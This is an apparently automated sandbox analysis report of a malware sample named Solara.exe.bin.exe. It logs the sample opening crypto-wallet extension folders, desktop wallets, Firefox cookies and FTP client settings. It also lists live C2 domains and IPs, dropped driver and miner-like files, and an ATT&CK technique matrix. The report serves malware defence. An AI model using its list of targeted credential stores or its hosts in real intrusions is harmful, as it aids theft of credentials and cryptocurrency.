                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                  Source: Yara matchFile source: 00000002.00000003.974422341.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.974203654.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Solara.exe.bin.exe PID: 5928, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 2.2.Solara.exe.bin.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.Solara.exe.bin.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2169158568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.962652813.0000000002E7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts141
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  2
                  OS Credential Dumping
                  1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  1
                  Web Service
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Command and Scripting Interpreter
                  1
                  Windows Service
                  1
                  Windows Service
                  11
                  Deobfuscate/Decode Files or Information
                  LSASS Memory11
                  File and Directory Discovery
                  Remote Desktop Protocol41
                  Data from Local System
                  13
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Scheduled Task/Job
                  1
                  Scheduled Task/Job
                  211
                  Process Injection
                  4
                  Obfuscated Files or Information
                  Security Account Manager54
                  System Information Discovery
                  SMB/Windows Admin Shares1
                  Screen Capture
                  21
                  Encrypted Channel
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts1
                  PowerShell
                  Login Hook1
                  Scheduled Task/Job
                  2
                  Software Packing
                  NTDS381
                  Security Software Discovery
                  Distributed Component Object Model3
                  Clipboard Data
                  4
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Timestomp
                  LSA Secrets1
                  Process Discovery
                  SSHKeylogging125
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading
                  Cached Domain Credentials271
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Masquerading
                  DCSync1
                  Application Window Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job271
                  Virtualization/Sandbox Evasion
                  Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt211
                  Process Injection
                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1638549 Sample: Solara.exe.bin.exe Startdate: 14/03/2025 Architecture: WINDOWS Score: 100 65 pastebin.com 2->65 67 citydisco.bet 2->67 73 Found malware configuration 2->73 75 Antivirus detection for URL or domain 2->75 77 Antivirus / Scanner detection for submitted sample 2->77 81 9 other signatures 2->81 11 Solara.exe.bin.exe 1 2->11         started        14 svchost.exe 1 1 2->14         started        signatures3 79 Connects to a pastebin service (likely for C&C) 65->79 process4 dnsIp5 93 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 11->93 95 Contains functionality to inject code into remote processes 11->95 97 Injects a PE file into a foreign processes 11->97 17 Solara.exe.bin.exe 1 11->17         started        22 WerFault.exe 22 16 11->22         started        24 conhost.exe 11->24         started        71 127.0.0.1 unknown unknown 14->71 signatures6 process7 dnsIp8 61 185.215.113.51, 49694, 49697, 49698 WHOLESALECONNECTIONSNL Portugal 17->61 63 citydisco.bet 188.114.96.3, 443, 49682, 49684 CLOUDFLARENETUS European Union 17->63 55 C:\Users\user\...\Z6T9189FJQPDA5HSM49.exe, PE32 17->55 dropped 83 Query firmware table information (likely to detect VMs) 17->83 85 Found many strings related to Crypto-Wallets (likely being stolen) 17->85 87 Tries to harvest and steal ftp login credentials 17->87 89 2 other signatures 17->89 26 Z6T9189FJQPDA5HSM49.exe 15 31 17->26         started        file9 signatures10 process11 dnsIp12 69 pastebin.com 104.20.4.235, 443, 49695 CLOUDFLARENETUS United States 26->69 57 C:\ProgramData\Dllhost\WinRing0x64.sys, PE32+ 26->57 dropped 59 C:\ProgramData\Dllhost\winlogson.exe, PE32+ 26->59 dropped 99 Multi AV Scanner detection for dropped file 26->99 101 Sample is not signed and drops a device driver 26->101 31 cmd.exe 1 26->31         started        34 cmd.exe 1 26->34         started        36 cmd.exe 1 26->36         started        file13 signatures14 process15 signatures16 103 Encrypted powershell cmdline option found 31->103 105 Uses schtasks.exe or at.exe to add and modify task schedules 31->105 107 Uses powercfg.exe to modify the power settings 31->107 109 Modifies power options to not sleep / hibernate 31->109 38 powershell.exe 23 31->38         started        41 conhost.exe 31->41         started        43 powercfg.exe 1 31->43         started        45 conhost.exe 34->45         started        47 schtasks.exe 1 34->47         started        49 conhost.exe 36->49         started        51 schtasks.exe 1 36->51         started        process17 signatures18 91 Loading BitLocker PowerShell Module 38->91 53 WmiPrvSE.exe 38->53         started        process19

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.